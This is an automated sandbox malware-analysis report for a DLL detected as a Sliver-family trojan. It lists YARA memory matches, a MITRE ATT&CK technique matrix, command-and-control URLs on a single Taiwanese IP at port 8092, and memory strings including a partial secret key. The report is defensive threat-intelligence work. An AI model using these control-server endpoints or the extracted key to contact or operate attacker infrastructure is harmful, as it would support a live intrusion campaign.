            Source: Yara matchFile source: 00000005.00000002.4218005900.000000000CCCA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.3835816223.000000000CCCA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4218398121.000000000A114000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4217009815.000000000CCD2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000003.2663104353.000000000CCF6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4220443970.000000000CCF6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.2589897810.000000000CCD2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7336, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7472, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7480, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7488, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7624, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7664, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		111
            Process Injection            		1
            Virtualization/Sandbox Evasion            		OS Credential Dumping1
            System Time Discovery            		Remote ServicesData from Local System11
            Non-Standard Port            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading            		111
            Process Injection            		LSASS Memory1
            Security Software Discovery            		Remote Desktop ProtocolData from Removable Media2
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Obfuscated Files or Information            		Security Account Manager1
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Regsvr32            		NTDS11
            System Information Discovery            		Distributed Component Object ModelInput Capture12
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Rundll32            		LSA SecretsInternet Connection DiscoverySSHKeylogging1
            Proxy            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            5cPRapVOx6.dll50%ReversingLabsWin32.Trojan.SliverMarte
            5cPRapVOx6.dll100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://203.204.217.190:8092/db/namespaces/signin.html?rp=33556174&w=6871591h9true
              		unknown
              http://203.204.217.190:8092/namespaces/db/oauth2callback/oauth2callback/db/api.html?c=68572884&oo=6708672y6true
                		unknown
                http://203.204.217.190:8092/db/oauth/db/oauth2/php/db/oauth2callback/rpc.html?h=75352k715&wh=18f84w5628true
                  		unknown
                  http://203.204.217.190:8092/oauth/oauth2/oauth2/api/oauth/php/oauth2callback/rpc.html?j=667332t1t6&yi=670f86726true
                    		unknown
                    http://203.204.217.190:8092/oauth/api/php/db/sign-up.html?_u=3355617q4&u=4866k2066true
                      		unknown
                      http://203.204.217.190:8092/database/namespaces/oauth2/oauth/database/rpc.html?bs=3q3556174&n=5l3348718true
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://203.204.217.190:8092/db/oauth/db/oauth2/php/db/oauth2callback/rpc.htmlrundll32.exe, 00000008.00000003.2661683184.000000000CE46000.00000004.00001000.00020000.00000000.sdmpfalse
                          		unknown
                          https://203.204.217.190:8092urathttps://203.204.217.190:8092rundll32.exe, 00000006.00000002.4221106121.000000000CDC8000.00000004.00001000.00020000.00000000.sdmpfalse
                            		unknown
                            http://203.204.217.190:8092/namespaces/oauth/sign-up.htmlrundll32.exe, 00000007.00000003.3671523760.000000000C9DC000.00000004.00001000.00020000.00000000.sdmpfalse
                              		unknown
                              https://203.204.217.190:8092B0rundll32.exe, 00000008.00000002.4210435396.000000000064A000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://203.204.217.190:8092/oauth/api/php/db/sign-up.phphttp://203.204.217.190:8092/oauth/api/php/dbrundll32.exe, 00000007.00000002.4214531173.000000000C88C000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://203.204.217.190:8092/db/oauth2callback/namespaces/login.html?AGE-SECRET-KEY-1M74AHG87SZUEJ8Trundll32.exe, 00000006.00000003.2589751609.000000000CD26000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://203.204.217.190:8092/db/oauth/db/oauth2/php/db/oauth2callback/rpc.html?rundll32.exe, 00000008.00000003.2661683184.000000000CE46000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://203.204.217.190:8092/oauth2callback/oauth2callback/sign-up.html?d=d74442283&la=63379h847rundll32.exe, 00000005.00000003.3834534105.000000000CDD6000.00000004.00001000.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://203.204.217.190:8092/namespaces/db/oauth2callback/oauth2callback/db/api.html?c=68572884&oo=67regsvr32.exe, 00000004.00000003.3996435378.000000000CDFA000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://203.204.217.190:8092/database/database/db/database/login.html?rundll32.exe, 00000008.00000002.4216262550.000000000CCA6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4214213422.000000000CC20000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://203.204.217.190:8092/register.htmlloaddll32.exe, 00000001.00000003.3285571702.000000000A196000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000002.4220677081.000000000A198000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://203.204.217.190:8092/rpc.phprundll32.exe, 00000006.00000003.2589897810.000000000CCFE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://203.204.217.190:8092Upgrade-Insecure-Requestsh=75352k715&wh=18f84w5628rundll32.exe, 00000008.00000003.2661833618.000000000CE28000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://203.204.217.190:8092/db/oauth2callback/namespaces/login.html?rundll32.exe, 00000006.00000002.4219849494.000000000CDAA000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2589121437.000000000CDAA000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2589751609.000000000CD26000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://203.204.217.190:8092/database/namespaces/oauth2/oauth/database/rpc.html?loaddll32.exe, 00000001.00000002.4223019198.000000000A298000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://203.204.217.190:8092/api/namespaces/login.html?loaddll32.exe, 00000001.00000002.4226594192.000000000A4A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://203.204.217.190:8092/register.php.loaddll32.exe, 00000001.00000002.4220764521.000000000A19C000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A19A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://203.204.217.190:8092Content-Transfer-Encodinghttps://203.204.217.190:8092WinHttpGetDefaultPrrundll32.exe, 00000008.00000002.4214213422.000000000CC1A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://203.204.217.190:8092/api/namespaces/login.html?r=3772_4761&so=584673b09Mozilla/5.0loaddll32.exe, 00000001.00000002.4215361930.000000000A082000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://203.204.217.190:8092ab1c2d3e4f5g6h7j8k9m0npqrtuvwxyzf=4d9398139&qc=dl58467309https://203.204rundll32.exe, 00000006.00000002.4214808976.000000000CCA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://203.204.217.190:8092/api/namespaces/login.phploaddll32.exe, 00000001.00000002.4226594192.000000000A4A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://203.204.217.190:8092http://203.204.217.190:8092WinHttpGetDefaultProxyConfiguratirundll32.exe, 00000008.00000003.2661833618.000000000CE28000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://203.204.217.190:8092hrundll32.exe, 00000005.00000002.4211265707.00000000007EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://203.204.217.190:8092/api/namespaces/login.html?r=3772_4761&so=584673b09loaddll32.exe, 00000001.00000002.4215361930.000000000A082000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://203.204.217.190:8092/api/oauth2callback/api/oauth2callback/database/database/php/api.html?htrundll32.exe, 00000005.00000002.4216612761.000000000CC98000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://203.204.217.190:8092/api/oauth/database/oauth/samples.phpregsvr32.exe, 00000004.00000003.3995842237.000000000CEBA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://203.204.217.190:8092/oauth/api/php/db/sign-up.html?rundll32.exe, 00000007.00000002.4214531173.000000000C88C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://203.204.217.190:8092kGrundll32.exe, 00000006.00000002.4211389999.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3917332777.00000000009CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://203.204.217.190:8092mtls://203.204.217.190:8082trundll32.exe, 00000007.00000003.3671523760.000000000C9CE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://203.204.217.190:8092/database/php/php/database/register.html?AGE-SECRET-KEY-1M74AHG87SZUEJ8Trundll32.exe, 00000007.00000003.3672973285.000000000C90E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://203.204.217.190:8092/oauth/oauth2/oauth2/api/oauth/php/oauth2callback/rpc.phphttp://203.204.2rundll32.exe, 00000005.00000003.3835054805.000000000CD5C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://f=4d9398139&qc=HTTP/1.1tnorundll32.exe, 00000006.00000002.4217009815.000000000CD0A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://203.204.217.190:8092/register.html?Hloaddll32.exe, 00000001.00000002.4220764521.000000000A19C000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A19A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://203.204.217.190:8092/oauth/api/php/db/sign-up.html?Hrundll32.exe, 00000007.00000002.4214531173.000000000C88C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://203.204.217.190:8092/oauth2callback/db/oauth2/php/api.html?regsvr32.exe, 00000004.00000002.4211857579.000000000CC20000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.3997562902.000000000CD26000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://203.204.217.190:8092/rpc.htmlSetFileCompletionNotificationModesC:rundll32.exe, 00000006.00000003.2589833273.000000000CD1A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://203.204.217.190:8092/api/oauth2callback/api/oauth2callback/database/database/php/api.htmlrundll32.exe, 00000005.00000002.4224807817.000000000CE86000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://203.204.217.190:8092/db/namespaces/signin.html?rp=33556174&w=6871591h9Mozilla/5.0rundll32.exe, 00000008.00000002.4214213422.000000000CC06000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://203.204.217.190:8092/namespaces/oauth/sign-up.html?dr=18845628&k=7303s814h1Mozilla/5.0rundll32.exe, 00000007.00000003.3672973285.000000000C902000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      http://h=75352k715&wh=HTTP/1.1tUser-Ageh=User-AgentUser-Agenth=75352k715&wh=Connectionrundll32.exe, 00000008.00000003.3674217974.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2661881087.000000000CE0C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://203.204.217.190:8092r=3772_4761&so=584673b09/loaddll32.exe, 00000001.00000002.4225609264.000000000A494000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://203.204.217.190:8092/oauth/oauth2callback/db/oauth2callback/api/oauth2/database/samples.phprundll32.exe, 00000008.00000003.2451552262.000000000CEFA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://203.204.217.190:8092/oauth2/database/api/php/samples.phploaddll32.exe, 00000001.00000002.4220764521.000000000A1A2000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A1A2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://203.204.217.190:8092/api/oauth2callback/api/oauth2callback/database/database/php/api.html?rundll32.exe, 00000005.00000002.4224807817.000000000CE86000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://203.204.217.190:8092/db/oauth2/register.html?WinHttpGetDefaultProxyConfiguration4rundll32.exe, 00000006.00000002.4221390129.000000000CDDC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://203.204.217.190:8092/db/oauth2callback/namespaces/login.phphttps://203.204.217.190:8092/db/orundll32.exe, 00000006.00000002.4219849494.000000000CDAA000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2589121437.000000000CDAA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://HTTP/1.1tUser-AgePOSTPOSITIONPRESANCTIFIEDAPRIORITYSITARISTSAUTOROUTEUser-AgentUser-AgentGAILregsvr32.exe, 00000004.00000003.3996365517.000000000CE34000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://203.204.217.190:80925rundll32.exe, 00000005.00000002.4211265707.00000000007EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://203.204.217.190:8092/http://203.204.217.190:8092rundll32.exe, 00000007.00000003.3671385890.000000000C9F4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://203.204.217.190:8092/oauth2/oauth/db/api.phpregsvr32.exe, 00000004.00000003.3996528506.000000000CDF2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            http://203.204.217.190:8092Upgrade-Insecure-Requestsx=19440630&xj=33556174CM_Get_Device_Interface_Lirundll32.exe, 00000006.00000002.4214808976.000000000CCA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://203.204.217.190:8092/rundll32.exe, 00000008.00000002.4214213422.000000000CC1A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3692594105.0000000000680000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://203.204.217.190:8092/db/api.html2006-01-02T15:04:05.999999999Z07:00rundll32.exe, 00000006.00000002.4212929021.000000000CC16000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://203.204.217.190:8092https://203.204.217.190:8092WinHttpGetDefaultProxyConfiguratarundll32.exe, 00000006.00000003.2588879689.000000000CDC8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://203.204.217.190:8092Upgrade-Insecure-Requestsbs=3q3556174&n=5l3348718sameloaddll32.exe, 00000001.00000002.4225609264.000000000A494000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://203.204.217.190:8092e=97374091&sa=63y379847regsvr32.exe, 00000004.00000002.4213969543.000000000CC8E000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.3998388511.000000000CC8E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://HTTP/1.1tUser-AgeUser-AgentUser-Agentd=loaddll32.exe, 00000001.00000002.4220764521.000000000A1AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://203.204.217.190:8092/db/oauth2/register.htmlrundll32.exe, 00000006.00000002.4221390129.000000000CDDC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://203.204.217.190:8092IREDrundll32.exe, 00000008.00000002.4224327410.000000000CDF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://203.204.217.190:8092/oauth/database/namespaces/database/api/db/database/register.html?rundll32.exe, 00000005.00000003.3835054805.000000000CD5C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://203.204.217.190:8092rundll32.exe, 00000008.00000003.2661833618.000000000CE28000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4221030380.000000000CD22000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://203.204.217.190:8092/oauth2callback/oauth2callback/sign-up.html?rundll32.exe, 00000005.00000003.3834789569.000000000CDA2000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4219138978.000000000CD24000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://HTTP/1.1trundll32.exe, 00000008.00000002.4214213422.000000000CC14000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://203.204.217.190:8092Upgrade-Insecure-Requestsrundll32.exe, 00000006.00000003.2589492198.000000000CD62000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3671385890.000000000C9F4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        http://203.204.217.190:8092/db/namespaces/signin.htmlrundll32.exe, 00000008.00000002.4214213422.000000000CC18000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://203.204.217.190:8092/php/signin.html?rundll32.exe, 00000007.00000002.4212133165.000000000C818000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://HTTP/1.1tUser-AgeUser-AgentUser-Agentrp=rundll32.exe, 00000008.00000002.4220443970.000000000CD0E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://203.204.217.190:8092/register.html?WinHttpGetDefaultProxyConfigurationloaddll32.exe, 00000001.00000002.4220764521.000000000A1A2000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A1A2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://203.204.217.190:8092_=82918870&eu=584673u09http://203.204.217.190:8092/rundll32.exe, 00000005.00000002.4221007051.000000000CD66000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://203.204.217.190:8092WinHttpGetDefaultProxyConfigurathttps://203.204.217.190:8092rundll32.exe, 00000008.00000002.4224327410.000000000CDF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://203.204.217.190:8092https://203.204.217.190:8092WinHttpGetDefaultProxyConfiguratcrundll32.exe, 00000005.00000003.3834672492.000000000CDC0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://203.204.217.190:8092/oauth2callback/db/oauth2/php/api.phphttps://203.204.217.190:8092/oauth2regsvr32.exe, 00000004.00000002.4211857579.000000000CC20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://203.204.217.190:8092/database/database/db/database/login.phprundll32.exe, 00000008.00000002.4214213422.000000000CC20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://203.204.217.190:8092/db/oauth2callback/namespaces/login.htmlrundll32.exe, 00000006.00000002.4219849494.000000000CDAA000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2589121437.000000000CDAA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://203.204.217.190:8092/oauth2callback/oauth2callback/sign-up.phprundll32.exe, 00000005.00000003.3834789569.000000000CDA2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://203.204.217.190:8092https://203.204.217.190:8092WinHttpGetDefaultProxyConfiguratnregsvr32.exe, 00000004.00000003.3998918249.000000000CC1A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://203.204.217.190:8092/db/oauth2/register.html?f=4d9398139&qc=dl58467309rundll32.exe, 00000006.00000002.4212929021.000000000CC06000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3618422591.000000000CC06000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  http://203.204.217.190:8092/oauth/oauth2/oauth2/api/oauth/php/oauth2callback/rpc.html?rundll32.exe, 00000005.00000003.3835054805.000000000CD5C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://203.204.217.190:8092/oauth2/oauth/db/api.html?regsvr32.exe, 00000004.00000003.3996528506.000000000CDF2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://HTTP/1.1tUser-AgeUser-AgentUser-Agentn=unixgramn=56_849732&pi=ConnectionConnectionConnectionrundll32.exe, 00000008.00000002.4214213422.000000000CC14000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://203.204.217.190:8092/oauth2callback/oauth2callback/sign-up.html?AGE-SECRET-KEY-1M74AHG87SZUErundll32.exe, 00000005.00000002.4219138978.000000000CD24000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://203.204.217.190:8092/rpc.htmlrundll32.exe, 00000006.00000003.2589833273.000000000CD1A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://hm=6708kc6726&o=HTTP/1.1trundll32.exe, 00000007.00000002.4223588113.000000000CA74000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://203.204.217.190:8092http://203.204.217.190:8092loaddll32.exe, 00000001.00000002.4214235667.000000000A05A000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.4221656723.000000000CE04000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4224327410.000000000CDF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                http://203.204.217.190:8092/namespaces/oauth/sign-up.phprundll32.exe, 00000007.00000003.3671523760.000000000C9DC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://203.204.217.190:8092Mozilla/5.0regsvr32.exe, 00000004.00000002.4211857579.000000000CC06000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3835679098.000000000CD04000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4216612761.000000000CC80000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2663104353.000000000CCF6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4220443970.000000000CCF6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    http://203.204.217.190:8092/rpc.php.rundll32.exe, 00000006.00000003.2589897810.000000000CCFE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://203.204.217.190:8092/database/namespaces/oauth2/oauth/database/rpc.phphttp://203.204.217.190:loaddll32.exe, 00000001.00000002.4223019198.000000000A298000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        http://203.204.217.190:8092/oauth2/database/api/php/samples.htmlloaddll32.exe, 00000001.00000002.4220764521.000000000A1A2000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A1A2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://203.204.217.190:8092/database/php/php/database/register.phphttps://203.204.217.190:8092/datarundll32.exe, 00000007.00000002.4214531173.000000000C8B2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://203.204.217.190:8092/database/namespaces/oauth2/oauth/database/rpc.htmlloaddll32.exe, 00000001.00000002.4223019198.000000000A298000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              https://203.204.217.190:8092resourcerundll32.exe, 00000007.00000002.4212133165.000000000C81A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://203.204.217.190:8092/oauth/api/php/db/sign-up.htmlrundll32.exe, 00000007.00000002.4214531173.000000000C88C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  http://203.204.217.190:8092/db/api.htmlrundll32.exe, 00000006.00000002.4212929021.000000000CC16000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		unknown

                                                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                                                    Public IPs

                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                    203.204.217.190
                                                                                                                                                                                                                    		unknownTaiwan; Republic of China (ROC)
                                                                                                                                                                                                                    		9416MULTIMEDIA-AS-APHoshinMultimediaCenterIncTWtrue

                                                                                                                                                                                                                    General Information

                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                    Analysis ID:1520451
                                                                                                                                                                                                                    Start date and time:2024-09-27 11:18:26 +02:00
                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                    Overall analysis duration:0h 9m 44s
                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                    Number of analysed new started processes analysed:13
                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                    • EGA enabled
